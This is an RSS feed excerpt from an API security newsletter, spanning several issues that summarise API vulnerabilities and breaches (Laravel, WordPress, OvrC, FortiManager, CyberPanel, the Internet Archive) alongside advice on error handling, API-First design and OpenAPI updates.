<p style="font-weight: 400;"><span style="font-weight: 400;">Staying on the topic of SDLC vulnerabilities, a recently </span><a href="https://cybersecuritynews.com/critical-laravel-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> critical vulnerability could compromise the security of APIs developed with the Laravel framework. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Laravel is a popular web application framework and is also used for API backend development. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The bug manifested itself at the request handling stage and allowed an attacker to gain unauthorized access by using malicious user input passed in a request as URL query strings. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a reminder that the frameworks that API developers choose to use in their projects can inadvertently introduce security vulnerabilities into APIs and applications. It highlights the importance of carefully choosing and configuring frameworks and libraries, many of which are not secure by default, and the need for extensive API security testing to identify issues early on.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Teams are also advised to monitor </span><a href="https://github.com/laravel/framework/security/advisories" target="_blank" rel="noopener"><span style="font-weight: 400;">advisory</span></a><span style="font-weight: 400;"> updates for all dependencies used in API development for prompt notification of new security issues and critical updates.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Python AI packages disguise malicious API </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">From PHP to Python, another gotcha for API developers to watch out for is the use of malicious third-party packages. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A </span><a href="https://www.darkreading.com/application-security/faux-chatgpt-claude-api-packages-jarkastealer" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> on the Dark Reading website describes how developers, keen to jump on the AI bandwagon, can be duped into installing malicious packages with hidden malware. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this incident developers were offered a quick and free way to add AI functionality into their projects by installing a Python package. The package claimed to provide API access to GenAI platforms, but behind the scenes the package also injects the developer’s project with malware. Notably, the package appeared to function as expected, making it easier for developers to miss the danger during testing. </span></p>
<blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">“They committed the extra effort to make it look legitimate”</span></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">Leveraging open-source software can significantly reduce development time and effort, but it also comes with inherent risks when the security of the code is essentially unknown. To mitigate these risks, development teams should adopt a zero-trust approach to open-source dependencies. This involves thoroughly reviewing, auditing, and testing any package before integration to ensure it meets security standards. </span></p>
<h2><span style="font-weight: 400;">Article: Node APIs done right</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Moving from vulnerabilities to best practices, the “</span><a href="https://www.platformatichq.com/node-principles" target="_blank" rel="noopener"><span style="font-weight: 400;">9 Principles for Doing Node.js Right in Enterprise Environments</span></a><span style="font-weight: 400;">” guide shares essential tips and recommendations for building secure and reliable APIs using the popular Node.js framework. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It includes recommendations by industry experts to  focus on defensive testing, including negative testing and security testing. It also devotes a section to error handling, a common source of API vulnerabilities and a major topic of our </span><a href="https://apisecurity.io/issue-259-api-flaw-exposes-4-million-wordpress-sites-api-error-handling-bugs-a-case-for-api-first/" target="_blank" rel="noopener"><span style="font-weight: 400;">previous issue</span></a><span style="font-weight: 400;"> of this newsletter.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The guide also describes the benefits of using API specifications in a multi-team environment. </span></p>
<blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">“By defining your API&#8217;s structure, data types, and operations, you can ensure that different teams can work independently while maintaining compatibility and avoiding misunderstandings”.</span></p>
</blockquote>
<p style="font-weight: 400;"><span style="font-weight: 400;">Similarly, API specifications help to clearly define and share the security requirements of an API, a practice we have been advocating for a long time in this newsletter.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This guide contains a lot of very useful information. Recommended reading!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: How a bug bounty hunt reveals API IDOR flaws</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The methods used by penetration testers and hackers can provide valuable insights to an API team on how to eliminate the risk from common API attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This </span><a href="https://myselfakash20.medium.com/decoding-api-vulnerabilities-my-bug-bounty-saga-on-api-vulnerabilities-affaf6a7c575?sk=09d95b306648f4a1f35bc555e92f2dd7" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> from a bug bounty hunter shows how an attacker can probe and test your API for an exploitable vulnerability. In this case, the bounty hunter focused on manipulating the API user input to attempt to invoke unexpected behavior or response from the target API, a common tactic used by hackers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By changing a user_id parameter in the API request, the bounty hunter discovered that the API would return a resource that did not belong to the authenticated user. This revealed that the API has a well known authorization vulnerability called Insecure Direct Object Reference (IDOR). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The relative simplicity of the test to uncover this severe API authorization flaw demonstrates why IDOR, also known as Broken Object Level Authorization (BOLA), is the top risk in the 2023 OWASP API Security Top 10 list. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Steps to prevent successful BOLA attacks against your APIs are shared </span><a href="https://apisecurity.io/owasp-api-security-top-10/api1-2023-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">here</span></a><span style="font-weight: 400;">. </span></p>
<p>The post <a href="https://apisecurity.io/issue-260-attacking-the-api-sdlc-lessons-from-an-api-bounty-hunter-node-apis-done-right-and-news-of-recent-vulnerabilities/">Issue 260: Attacking the API SDLC, lessons from an API bounty hunter, Node APIs done right and news of recent vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 259: API flaw exposes 4 million WordPress sites, API error handling bugs, a case for API First</title>
		<link>https://apisecurity.io/issue-259-api-flaw-exposes-4-million-wordpress-sites-api-error-handling-bugs-a-case-for-api-first/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 21 Nov 2024 17:26:09 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[API Breaches]]></category>
		<category><![CDATA[API error codes]]></category>
		<category><![CDATA[API First]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11252</guid>

					<description><![CDATA[<p>This week, we focus on the topic of API error handling and how a REST API exposed 4 million WordPress websites to account takeover attacks. We also cover the risks and best practices for designing API error responses, and we look at an article that makes a great case for API-First. Vulnerability: 4,000,000 WordPress sites [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-259-api-flaw-exposes-4-million-wordpress-sites-api-error-handling-bugs-a-case-for-api-first/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-259-api-flaw-exposes-4-million-wordpress-sites-api-error-handling-bugs-a-case-for-api-first/">Issue 259: API flaw exposes 4 million WordPress sites, API error handling bugs, a case for API First</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we focus on the topic of API error handling and how a REST API exposed 4 million WordPress websites to account takeover attacks. We also cover the risks and best practices for designing API error responses, and we look at an article that makes a great case for API-First.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: 4,000,000 WordPress sites vulnerable to improper API error handling</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A research team at Wordfence recently </span><a href="https://www.wordfence.com/blog/2024/11/really-simple-security-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> a vulnerability in the REST API of a WordPress plugin called the Simple Security plugin. This vulnerability allows a hacker to log into the site as any other registered user without providing a valid security token, effectively bypassing API authentication. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">WordPress is a hugely popular web content management system. It’s estimated that this API vulnerability impacted over 4 million WordPress sites.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">When an API detects an error condition, such as a missing token in a request, the API should always catch the error and respond in a controlled manner, typically returning an appropriate status code and a message describing the cause of the error: </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">HTTP 401 { “message”: “invalid credentials”}</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, if a hacker can cause an error that is not expected or handled by the API, this flaw in error handling can cause the API to behave in unexpected ways, such as bypassing authentication. This appears to be the root cause of this incident.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Interestingly, the report indicates that this vulnerability was created in the plugin code while it was being upgraded with new security features. It is possible that the development team was so focused on delivering a working security feature that they neglected to consider error handling during API design and testing, when the vulnerability could have been prevented, or at least discovered before it went live and impacted 4,000,000 sites.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This incident highlights why API error handling is an important component of API security and should be standardized as a security requirement in API design. For reference </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Error_Handling_Cheat_Sheet.html#objective" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP</span></a><span style="font-weight: 400;"> provides helpful information and code examples for recommended error-handling practices. </span></p>
<h2><span style="font-weight: 400;">Article: The benefits of governance rules on API Error messages</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Still on the topic of API error handling, this </span><a href="https://nordicapis.com/5-real-world-examples-of-great-api-error-messages/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> from NordicAPIs shares examples of well-crafted API response messages from Stripe, Instagram, and Salesforce. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These are great examples of how APIs should be designed from the perspective of the API consumer. Clear, consistent, and self-describing error messages make the API easier to understand and use, which in turn makes it easier to integrate the API and provides a better developer experience for the API consumer. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Also, by carefully designing the shape of an API error response up front, the API team defines rules and constraints on the type, format, content and size of data that the API should return. Incidentally, OpenAPI can be used to precisely describe the structure of response messages.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This has obvious security benefits. Bugs in API error-handling code can easily lead to unauthorized data leakage, especially when error-handling code receives less attention during API development and testing. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We’ve covered real-world examples of this in previous issues of this newsletter, such as incidents at </span><a href="https://apisecurity.io/issue-251-fcc-mandates-api-security-api-vulnerabilities-in-dating-apps-and-docker-plugins-life360-api-data-leak/#:~:text=Breach%3A%20Life360%20API%20leaks%20personal%20data%20of%20400%2C000%20customers" target="_blank" rel="noopener"><span style="font-weight: 400;">Life360</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/issue-248-api-penetration-of-apps-and-modems-graphql-and-its-discontents-api-security-for-supply-chain-and-automotive/#:~:text=Breach%3A%20API%20vulnerabilities%20exposed%20millions%20of%20Cox%20modems%20to%20remote%20hacking" target="_blank" rel="noopener"><span style="font-weight: 400;">Cox Communications </span></a><span style="font-weight: 400;">where private data was inadvertently leaked in error response messages. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">It’s no surprise then that hackers would attempt to intentionally invoke errors in an API as part of early reconnaissance, since error handling is considered a point of vulnerability. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">On the other hand, well-designed and consistent error response messages can help create APIs that are easier to use and also resilient to attacks. </span></p>
<h2><span style="font-weight: 400;">Article: Leaking Open Source Intelligence with API Error Codes </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">When my youngest son comes to me asking for chocolate biscuits before dinner, I can respond in one of two ways: “Those biscuits are forbidden before dinner” HTTP 403, or “There are no biscuits to be found” HTTP 404. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If I respond with 403 instead of 404, the result is essentially the same (he doesn’t get the biscuit), but I’ve inadvertently given him a crucial piece of information he didn’t need to know…there are chocolate biscuits in the house. This information leak will undoubtedly trigger a flood of persistent followup requests. I should have responded with 404 Not Found! </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is essentially the point of a recent Cyber Security News </span><a href="https://cybersecuritynews.com/how-can-http-status-codes-tip-off-a-hacker/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on API error codes. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">When an API returns an error response to deny a request, the choice of status code returned by the API can reveal useful open source intelligence (OSINT) to a hacker. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, HTTP error codes 403 and 404 both indicate that access is denied, but they can also confirm the presence or absence of a requested resource. This is called a discrepancy factor. A hacker can use a discrepancy factor of a vulnerable login API, for example for a mobile app or SaaS platform, to check whether an account exists or not for a given email address. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">And if the vulnerable API has no usage limits, a hacker can easily launch an account enumeration attack and identify millions of registered users on your application or platform. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">My opinion is that 403 is an appropriate response if a user requests access to a resource that they do not have access to, but could potentially be granted access to. Otherwise, if a user should never have access to the resource, the API should behave as if that resource doesn’t exist for that user and always return 404. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">You can read more tips on handling error codes in this OWASP </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html#http-return-code" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">. </span></p>
<h2><span style="font-weight: 400;">Article: Making a case for API-First</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In an </span><a href="https://thenewstack.io/why-api-first-matters-in-an-ai-driven-world/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on The New Stack, Frank Kilcommins makes a strong case for adopting API-First principles to promote better API interoperability, consistency, and reuse, especially as the number of APIs skyrockets to meet the voracious demands for input from AI-driven systems.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article outlines the core principles of API-First and describes the typical drivers and benefits of this approach to API development, both from a technical and business perspective. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">When it comes to building an “AI-ready” API, the API must be easy to understand and consume automatically. This requires designing the API with the needs of the AI consumer in mind, which is one of the defining principles of the API-First approach. Additionally, using formal specifications like OpenAPI can help create a design process for producing high-quality, AI-ready APIs:</span></p>
<p style="font-weight: 400;"><i><span style="font-weight: 400;">“Specifications allow you to enforce consistency, define data structures, and provide clear constraints, all of which help machine consumers interact confidently with your APIs”</span></i></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Back to this week’s main theme, the benefits of an API-First approach also help to solve the challenges of implementing secure API error handling. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A carefully considered design of the API error response, with consistent structure and format for messages and a shortlist of expected status codes, will make it easier for an AI agent to predictably consume the API and gracefully handle error conditions. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a very informative article on API-First that I highly recommend. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Account TakeOver of Cloud-connected IOT devices </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Claroty research team </span><a href="https://claroty.com/team82/research/the-problem-with-iot-cloud-connectivity-and-how-it-exposed-all-ovrc-devices-to-hijacking" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> critical API vulnerabilities in the OvrC platform, a cloud-based platform for remote management of smart devices in homes and businesses.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">One vulnerability allowed a user to retrieve the status of any device registered to the Ovrc cloud, regardless of ownership. A user simply sends a valid device MAC address to the API, which can easily be guessed, and the API effectively confirms the existence of the device by returning a JSON response with the latest device status. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By iterating over the vulnerable API with different MAC addresses, the research team was able to enumerate all devices connected to the cloud platform. The team estimates that over 10 million devices worldwide were affected by the vulnerability. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Additional API vulnerabilities were discovered that allowed the team to take ownership of any device. The API responsible for registering ownership failed to enforce and authenticate a required device ID property in the request, allowing a user to bypass authentication and claim ownership and control over any device. Vulnerable devices included surveillance cameras used in homes and business premises.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to an </span><a style="font-weight: 400;" href="https://www.imperva.com/resources/resource-library/reports/2024-bad-bot-report/" target="_blank" rel="noopener"><span style="font-weight: 400;">industry report </span></a><span style="font-weight: 400;">from Imperva, 44% of account takeover attacks recorded last year targeted authentication APIs to exploit vulnerabilities such as authentication bypass. API teams must be vigilant in designing and testing authentication APIs with security firmly in mind. </span></p>
<p>The post <a href="https://apisecurity.io/issue-259-api-flaw-exposes-4-million-wordpress-sites-api-error-handling-bugs-a-case-for-api-first/">Issue 259: API flaw exposes 4 million WordPress sites, API error handling bugs, a case for API First</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 258: API governance at Vodafone, OpenAPI updates, APIs with OWASP vulnerabilities</title>
		<link>https://apisecurity.io/issue-258-api-governance-at-vodafone-openapi-updates-apis-with-owasp-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 07 Nov 2024 16:04:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11247</guid>

					<description><![CDATA[<p>This week, we take a look at Vodafone’s journey to API Governance with both challenges and benefits. We review news about the latest patch updates to the OpenAPI specification, and tips for API prototyping using OpenAPI description files. We also have multiple incidents of APIs with OWASP vulnerabilities like broken authentication and security misconfiguration. Article: [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-258-api-governance-at-vodafone-openapi-updates-apis-with-owasp-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-258-api-governance-at-vodafone-openapi-updates-apis-with-owasp-vulnerabilities/">Issue 258: API governance at Vodafone, OpenAPI updates, APIs with OWASP vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we take a look at Vodafone’s journey to API Governance with both challenges and benefits. We review news about the latest patch updates to the OpenAPI specification, and tips for API prototyping using OpenAPI description files. We also have multiple incidents of APIs with OWASP vulnerabilities like broken authentication and security misconfiguration.</span></p>
<h2><span style="font-weight: 400;">Article: Vodafone’s journey to API Governance</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">First, Dimitris Maimaris </span><a href="https://tech.gr.vodafone.com/post/api-governance" target="_blank" rel="noopener"><span style="font-weight: 400;">shares</span></a><span style="font-weight: 400;"> Vodafone’s experience in adopting an API-first approach to API development and creating an effective program for API governance. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Vodafone’s API team consists of 100 developers and QA engineers, supported by 16 solution architects, managing a growing ecosystem of over 250 APIs. As the number of APIs grew, the team sought to adopt standardized policies and practices to govern how APIs are developed, deployed and used. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Standardizing practices across the API lifecycle creates consistency in how team members operate, as well as consistency in how API security policies are reliably enforced across all APIs. Vodafone reports benefits in terms of improved API integration, reduced redundancy and enhanced reusability, as well as reduced dependency between front-end and back-end teams to accelerate API development and service delivery.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Recommended reading for API teams. </span></p>
<h2><span style="font-weight: 400;">Article: Create API prototypes using OpenAPI</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">OpenAPI provides a formal, widely accepted format for describing an API. You can use it to define the paths and operations that an API supports, the headers and parameters that it requires or accepts, and the schemas of the data that are passed in request and response messages. You can also use OpenAPI to define the authentication or authorization information that an API requires.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">So, an OpenAPI description can provide a complete and detailed design of the expected behavior of an API. However, sometimes it is necessary to test something to get a real idea of ​​how it works. So how do we quickly and easily convert an API design from a static OpenAPI document into something functional that we can test?</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In his recent </span><a href="https://apichangelog.substack.com/p/an-interactive-approach-to-api-prototyping" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">, Bruno Pedro explains how he achieved this by building his own API prototyping solution from a selection of useful VSCode extensions. With this tool, he is able to simulate an API server and generate a useful API client, both by leveraging the OpenAPI description of the API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to the </span><a href="https://learn.openapis.org/introduction.html" target="_blank" rel="noopener"><span style="font-weight: 400;">OpenAPI initiative</span></a><span style="font-weight: 400;">, an API description file should “strive to be as complete and fully-detailed as possible…the more unambiguous it is, the more useful it becomes”. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is certainly true when it comes to automatically generating mock API clients and responses, as a detailed and complete API description will help create a more realistic API simulation. Therefore, auditing an OpenAPI file for correctness and completeness is an important step in creating useful API prototypes.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Great article by Bruno Pedro, a must read.</span></p>
<h2><span style="font-weight: 400;">Industry News: OpenAPI releases 3.0.4 and 3.1.1</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">New updates to the OpenAPI specification have been released for versions 3.0 and 3.1.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to the </span><a href="https://github.com/OAI/OpenAPI-Specification/releases" target="_blank" rel="noopener"><span style="font-weight: 400;">release notes</span></a><span style="font-weight: 400;">, there are no changes to the requirements in the 3.0.4 or 3.1.1 patch releases. Instead, the updates focus on improving the text of the specification, with clarifications and additional examples provided for a number of sections.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Information has been added to better explain data types and query parameters. There is now a separate section describing headers. Additionally, more examples have been added in 3.0.4 and 3.1.1, which really help illustrate and clarify some of the text.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">If your team is currently using older versions of 3.0 or 3.1, you should consider updating your documentation links to point to these newer versions.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Also check out this </span><a href="https://www.youtube.com/watch?v=Eh9r4UTaVp4" target="_blank" rel="noopener"><span style="font-weight: 400;">video</span></a><span style="font-weight: 400;"> of Erik Wilde interviewing OAI Technical Steering Committee member Lorna Mitchell about these latest patch releases, as well as a status update on versions 3.2 and 4.0 (aka &#8220;moonwalk&#8221;).</span></p>
<h2><span style="font-weight: 400;">Breach: Fortinet devices exposed by broken API authentication</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">FortiGate network firewalls can be exploited via a vulnerable API in FortiManager, a network management platform used to centrally control multiple firewall deployments.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to a </span><a href="https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-fortimanager-flaw-used-in-zero-day-attacks/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, the API implements the FortiGate to FortiManager (FGFM) protocol. A security bug in the API allows commands to be sent to networked devices without any authorization. This allows attackers to remotely take control of the FortiManager device and connected FortiGate firewall devices within vulnerable enterprise networks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Network devices now commonly offer APIs to facilitate integration with other devices and services, as well as provisioning or configuring device settings. We have previously reported API vulnerabilities found in </span><a href="https://apisecurity.io/issue-256-privilege-escalation-bugs-in-kia-vehicles-cisco-and-gov-apis-nists-new-rules-for-password-security/#:~:text=Vulnerability%3A%20Broken%20Authorization%20in%20Cisco%20Nexus%20Platform%20APIs" target="_blank" rel="noopener"><span style="font-weight: 400;">Cisco</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/#:~:text=Vulnerability%3A%20API%20Incident%20on%20Trend%20Micro%E2%80%99s%20Cloud%20Edge" target="_blank" rel="noopener"><span style="font-weight: 400;">Trend Micro</span></a><span style="font-weight: 400;"> network devices that also allow an attacker to access and compromise other connected devices. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This is a reminder that APIs are frequently deployed with critical security vulnerabilities, whether these APIs are used in web applications, mobile applications, or critical network devices, and must be thoroughly tested to uncover such vulnerabilities.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Multiple OWASP Vulnerabilities found in Cyberpanel </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Cyberpanel is a free, open-source web hosting control panel. A researcher has </span><a href="https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce" target="_blank" rel="noopener"><span style="font-weight: 400;">discovered</span></a><span style="font-weight: 400;"> two API vulnerabilities that together expose the platform to command injection attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In the case of the first vulnerability, the API was developed to enforce authentication separately on each individual API route, and in some cases, developers forgot to enforce the necessary authentication. For the second vulnerability, the API was developed to explicitly handle HTTP POST requests, but also accepted and handled other HTTP verbs such as PUT and PATCH by default, causing unexpected execution paths in the API code.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For security reasons, it is strongly recommended to apply authorization on an API level rather than at the individual route or operation level. This ensures that authorization is applied as the default behavior for all new routes or paths added to an API. On the other hand, applying authorization on each individual route is an error-prone approach, as it is easy for developers to forget to include essential security checks when adding a new route or operation to an API. This appears to have happened repeatedly with the Cyberpanel API. Adopting best practices could help reduce the risk of the same security bug recurring.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For the second issue, the OWASP Top 10 API security </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa8-security-misconfiguration/" target="_blank" rel="noopener"><span style="font-weight: 400;">guidelines</span></a><span style="font-weight: 400;"> recommend explicitly disabling unnecessary features, including HTTP verbs, to avoid security misconfiguration vulnerabilities in APIs. This means that an API should only accept and process HTTP verbs that are expected for an operation. For any other verbs received, the API should respond with an HTTP 405 “Method Not Allowed” response. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The detailed research to uncover vulnerabilities in this case provides an opportunity to address root causes, implement best practices, and prevent future security incidents.</span></p>
<p>The post <a href="https://apisecurity.io/issue-258-api-governance-at-vodafone-openapi-updates-apis-with-owasp-vulnerabilities/">Issue 258: API governance at Vodafone, OpenAPI updates, APIs with OWASP vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 257: Internet Archive under attack, API Gateways insecure by default, OWASP injection attacks</title>
		<link>https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 24 Oct 2024 12:34:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11240</guid>

					<description><![CDATA[<p>This week, we look at the recent data breach at the Internet Archive and the critical role of API token management. We have a report from Trend Micro detailing security issues with API Gateway deployments, and we look at recently discovered OWASP API vulnerabilities in popular enterprise and open source platforms. Also a quick look [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/">Issue 257: Internet Archive under attack, API Gateways insecure by default, OWASP injection attacks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at the recent data breach at the Internet Archive and the critical role of API token management. We have a report from Trend Micro detailing security issues with API Gateway deployments, and we look at recently discovered OWASP API vulnerabilities in popular enterprise and open source platforms. Also a quick look at the new GNAP protocol and what it offers over OAuth 2.0.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Key Lessons at the Internet Archive</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Since early October, the Internet Archive, home of the popular Wayback Machine web archive, has suffered a number of high-profile attacks by groups credibly claiming to have breached Internet Archive’s systems and platforms.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">According to one </span><a href="https://www.bleepingcomputer.com/news/security/internet-archive-breached-again-through-stolen-access-tokens/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, the attacker initially gained unauthorized access after discovering an exposed Gitlab authentication token on an Internet Archive development server. The token was reportedly exposed for over two years, yet it still allowed the hacker to access Internet Archive’s source code on Gitlab. From this source code, additional tokens were discovered, including an API token for the company&#8217;s Zendesk support system. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Zendesk API token allowed the hacker to access over 800,000 support tickets. Many of the tickets were submitted privately by users and included identifying information. It&#8217;s worth noting that two weeks after the issue was reported to Internet Archive, the Zendesk API token could still be used to access their admin account. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Both the original Gitlab token and the Zendesk API token appear to be long-lived tokens or to have no expiration date. A </span><a href="https://support.zendesk.com/hc/en-us/community/posts/4448855490714-Zendesk-APIs-Token-Security" target="_blank" rel="noopener"><span style="font-weight: 400;">thread</span></a><span style="font-weight: 400;"> on Zendesk support also indicates that Zendesk API tokens (really API keys) do not limit the scope of access by role or resource. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of token management isn’t the root cause of the breach, but it can certainly increase the likelihood of persistent attacks and compound the damage by granting all-or-nothing access to systems and resources. </span></p>
